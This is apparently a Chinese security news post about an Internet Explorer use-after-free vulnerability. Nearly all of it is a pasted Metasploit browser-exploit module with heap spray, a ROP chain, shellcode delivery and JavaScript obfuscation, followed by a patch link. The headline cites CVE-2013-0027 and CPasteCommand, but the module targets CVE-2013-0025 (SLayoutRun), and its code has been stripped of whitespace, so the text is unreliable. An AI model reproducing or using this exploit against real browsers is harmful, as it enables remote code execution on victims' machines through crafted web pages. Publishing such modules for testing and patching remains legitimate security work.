高危漏洞CVE-2013-0027 EXP 影响IE所有版本

Microsoft Internet Explorer处理CPasteComma存在一个释放后使用错误，允许构建恶意WEB页，诱使用户解析，可以应用程序上下文执行任意代码。CVE编号CVE-2013-0027，影响版本如下：

Microsoft Internet Explorer 10

Microsoft Internet Explorer 9

Microsoft Internet Explorer 8

Microsoft Internet Explorer 7

Microsoft Internet Explorer 6

在Metasploit已经发布相应的利用脚本，如下：

## 
#ThisfileispartoftheMetasploitFrameworkandmaybesubjectto 
#redistributionandcommercialrestrictions.PleaseseetheMetasploit 
#Frameworkwebsiteformoreinformationonlicensingandtermsofuse. 
#http://metasploit.com/framework/ 
## 
 
require'msf/core'
 
classMetasploit3<Msf::Exploit::Remote 
Rank=NormalRanking 
 
includeMsf::Exploit::Remote::HttpServer::HTML 
includeMsf::Exploit::RopDb 
 
definitialize(info={}) 
super(update_info(info, 
'Name'=>"MS13-009MicrosoftInternetExplorerSLayoutRunUse-After-Free", 
'Description'=>%q{ 
Thismoduleexploitsause-after-freevulnerabilityinMicrosoftInternetExplorer 
whereaCParaElementnodeisreleasedbutareferenceisstillkept 
inCDoc.ThismemoryisreusedwhenaCDocrelayoutisperformed. 
}, 
'License'=>MSF_LICENSE, 
'Author'=> 
[ 
'ScottBell<scott.bell@security-assessment.com>'#Vulnerabilitydiscovery&Metasploitmodule 
], 
'References'=> 
[ 
['CVE','2013-0025'], 
['MSB','MS13-009'], 
['URL','http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf'] 
], 
'Payload'=> 
{ 
'BadChars'=>"\x00", 
'Space'=>920, 
'DisableNops'=>true, 
'PrependEncoder'=>"\x81\xc4\x54\xf2\xff\xff"#Stackadjustment#addesp,-3500 
}, 
'DefaultOptions'=> 
{ 
'InitialAutoRunScript'=>'migrate-f'
}, 
'Platform'=>'win', 
'Targets'=> 
[ 
['Automatic',{}], 
['IE8onWindowsXPSP3',{'Rop'=>:msvcrt,'Offset'=>0x5f4}] 
], 
'Privileged'=>false, 
'DisclosureDate'=>"Feb132013", 
'DefaultTarget'=>0)) 
 
register_options( 
[ 
OptBool.new('OBFUSCATE',[false,'EnableJavaScriptobfuscation',false]) 
],self.class) 
 
end 
 
defget_target(agent) 
#Iftheuserisalreadyspecifiedbytheuser,we'lljustusethat 
returntargetiftarget.name!='Automatic'
 
nt=agent.scan(/WindowsNT(\d\.\d)/).flatten[0]||''
ie=agent.scan(/MSIE(\d)/).flatten[0]||''
 
ie_name="IE#{ie}"
 
casent 
when'5.1'
os_name='WindowsXPSP3'
end 
 
targets.eachdo|t| 
if(!ie.empty?andt.name.include?(ie_name))and(!nt.empty?andt.name.include?(os_name)) 
print_status("Targetselectedas:#{t.name}") 
returnt 
end 
end 
 
returnnil 
end 
 
defheap_spray(my_target,p) 
js_code=Rex::Text.to_unescape(p,Rex::Arch.endian(target.arch)) 
js_nops=Rex::Text.to_unescape("\x0c"*4,Rex::Arch.endian(target.arch)) 
 
js=%Q| 
 
varheap_obj=newheapLib.ie(0x20000); 
varcode=unescape("#{js_code}"); 
varnops=unescape("#{js_nops}"); 
while(nops.length<0x80000)nops+=nops; 
varoffset=nops.substring(0,#{my_target['Offset']}); 
varshellcode=offset+code+nops.substring(0,0x800-code.length-offset.length); 
while(shellcode.length<0x40000)shellcode+=shellcode; 
varblock=shellcode.substring(0,(0x80000-6)/2); 
heap_obj.gc(); 
for(vari=1;i<0x300;i++){ 
heap_obj.alloc(block); 
} 
varoverflow=nops.substring(0,10); 
 
| 
 
js=heaplib(js,{:noobfu=>true}) 
 
ifdatastore['OBFUSCATE'] 
js=::Rex::Exploitation::JSObfu.new(js) 
js.obfuscate 
 
end 
 
returnjs 
end 
 
defget_payload(t,cli) 
code=payload.encoded 
 
#Norop.Justreturnthepayload. 
returncodeift['Rop'].nil? 
 
#ROPchaingeneratedbymona.py-Seecorelan.be 
caset['Rop'] 
when:msvcrt 
print_status("UsingmsvcrtROP") 
rop_nops=[0x77c39f92].pack("V")*11#RETN 
rop_payload=generate_rop_payload('msvcrt',"",{'target'=>'xp'}) 
rop_payload<<rop_nops 
rop_payload<<[0x77c364d5].pack("V")#POPEBP#RETN 
rop_payload<<[0x77c15ed5].pack("V")#XCHGEAX,ESP#RETN 
rop_payload<<[0x77c35459].pack("V")#PUSHESP#RETN 
rop_payload<<[0x77c39f92].pack("V")#RETN 
rop_payload<<[0x0c0c0c8c].pack("V")#Shellcodeoffset 
rop_payload<<code 
end 
 
returnrop_payload 
end 
 
defget_exploit(my_target,cli) 
p=get_payload(my_target,cli) 
js=heap_spray(my_target,p) 
 
html=%Q| 
<!doctypehtml> 
<html> 
<head> 
<script> 
#{js} 
</script> 
<script> 
vardata; 
varobjArray=newArray(1150); 
 
setTimeout(function(){ 
document.body.style.whiteSpace="pre-line"; 
 
CollectGarbage(); 
 
for(vari=0;i<1150;i++){ 
objArray[i]=document.createElement('div'); 
objArray[i].className=data+=unescape("%u0c0c%u0c0c"); 
} 
 
setTimeout(function(){document.body.innerHTML="boo"},100) 
},100) 
 
</script> 
</head> 
<body> 
<p></p> 
</body> 
</html> 
| 
 
returnhtml 
end 
 
defon_request_uri(cli,request) 
agent=request.headers['User-Agent'] 
uri=request.uri 
print_status("Requesting:#{uri}") 
 
my_target=get_target(agent) 
#Avoidtheattackifnosuitabletargetfound 
ifmy_target.nil? 
print_error("Browsernotsupported,sending404:#{agent}") 
send_not_found(cli) 
return
end 
 
html=get_exploit(my_target,cli) 
html=html.gsub(/^\t\t/,'') 
print_status"SendingHTML..."
send_response(cli,html,{'Content-Type'=>'text/html'}) 
 
end 
 
end

微软安全补丁：https://technet.microsoft.com/en-us/security/bulletin/ms13-009